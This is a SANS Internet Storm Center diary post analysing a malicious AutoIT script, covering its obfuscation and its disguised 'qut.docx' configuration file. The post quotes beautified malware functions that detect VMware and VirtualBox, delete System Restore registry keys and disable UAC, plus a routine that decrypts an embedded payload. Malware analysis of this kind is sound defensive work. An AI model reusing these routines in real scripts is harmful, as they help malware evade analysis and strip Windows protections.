Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: Diving into Malicious AutoIT Code - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Diving into Malicious AutoIT Code

Following my yesterday diary[1], I had a deeper look at the malicious AutoIT script dropped in my sandbox. For those who are not aware of AutoIT, it is a BASIC-like scripting language designed for automating Windows tasks. If scripts can be very simple, they can also interact with any feature of the operating system.

The analyzed script has the following SHA256 hash: d5a8cdc7ae6a49233ee021a39f12ef61c630202f68edc3a7d64fd1b616704d8d and is still unknown on VT when writing this diary. The script uses different obfuscation techniques like:

Long random variable names:

$9355FBBA246C8217C04EE3075C218909 = @TempDir & "\" & $989BD8DF7434150DDDCC4E3AF84571E3

Hex-encoded portions of the script:

Execute(BinaryToString("0x536C656570283130303029”))

Which, decoded, executes: 

Sleep(1000)

Unused parameters, parameters or lines of code duplication

The script loads and executes a portion of code from external files:

$F2EE618C99E95AD0E9BB8DA5F76EE4DC = IniRead($6D8EA853F0F9D4F4725A7B18BA8E68E5, "Setting", "AuEx", ‘')
Run($9355FBBA246C8217C04EE3075C218909 & "\" & $1B6FE00D126CF844740F878410AD34F2 & " " & FileGetShortName($9355FBBA246C8217C04EE3075C218909 & "\" & $F2EE618C99E95AD0E9BB8DA5F76EE4DC))

The script reads a configuration file ("qut.docx") that is also obfuscated with many comments. Once cleaned, we have this:

[Setting]
HDX_Keys=433643363536343446464534374330344533414641454339363134443445433237354544314642383532364332463738
Keys=trx
Dir=33623513
Key=qwertyjhgfdsdfgh.exe
AuEx=ehm=ogk
ExEc=whr.exe
StartUps=iud-5aZXL77H7wIRrA22S74M7C
9up16HX9UB55B7W410G0j9C[Data]0x3818ACFFD2E13CD58F7
….. [eData]29UoXR9414z3A158ZcBCn3o62R0OKP5G3FO8G479nj5j4WPus
RP=jog.rln
sK=846
sN=dng.snk
inc=itu.wjf
GLx70j31N9Y7jJDow465116a863g57S13dq290813801Rqp1y95S63R[s

Note the presence of "[Data]" and "[eData]". The code between them is extracted and decrypted (the code has been beautified):

Func _S0xB90F6847EC557E33AF45D188DF40E553($6041FCAD8A4EB8C30A147D795679C7FA)
    $key = IniRead($docxConfigFile, "Setting", "Keys", '')
    Global $fhandle = FileRead($docxConfigFile)
    $buffer = f_extract_string($fhandle, "[Data]", "[eData]")
    $fhandle = $buffer[0]
    $fhandle = f_decrypt($fhandle, $key, 0x00006602)
    $47AAAA106EEBB77E0556A0111B63ED18 = _S0xA011B5402E3FD470217B241163CA15BB()
    _S0x5498F30D3302580A94D5B06B04E62B42($fhandle, "", $47AAAA106EEBB77E0556A0111B63ED18)
EndFunc   

The script also implements analysis detection techniques (again beautified):

Func f_detectvm()
    $_E0x456DAE09D320D97B2AE45304623B4B9C = "VMwaretray.exe"
    $_E0x7C94F3C4E05A0676BD34966A4E247A02 = "Vbox.exe"
    If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
        Exit
    EndIf
    If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
        Exit
    EndIf
    If ProcessExists("VBoxTray.exe") Or ProcessExists("VBo" & "xServ" & "ice.exe") Or ProcessExists("vpcmap.exe") Or ProcessExists("vpcmap.exe") Then
        Exit
    EndIf
    If ProcessExists($_E0x456DAE09D320D97B2AE45304623B4B9C) Then
        Exit
    EndIf
    If ProcessExists($_E0x7C94F3C4E05A0676BD34966A4E247A02) Then
        Exit
    EndIf
EndFunc

Func f_disable_restore_points()
    If FileExists(@ScriptDir & "\ini") Then
    Else
        RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
        FileWrite(@ScriptDir & "\ini", "")
    EndIf
EndFunc

Func f_disable_lua()
    $lua = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
    If Not ($lua = "0") Then
        RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
    EndIf
EndFunc 

It has many similarities with another script that I analyzed a few months ago[2]. There is plenty of code present in the script (hex-encoded) that is injected into other processes but I don't know yet the purpose of this code.

[1] https://isc.sans.edu/forums/diary/Malicious+Powershell+using+a+Decoy+Picture/24234/
[2] https://isc.sans.edu/forums/diary/Malicious+AutoIT+script+delivered+in+a+selfextracting+RAR+file/22756/

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Xme

429 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!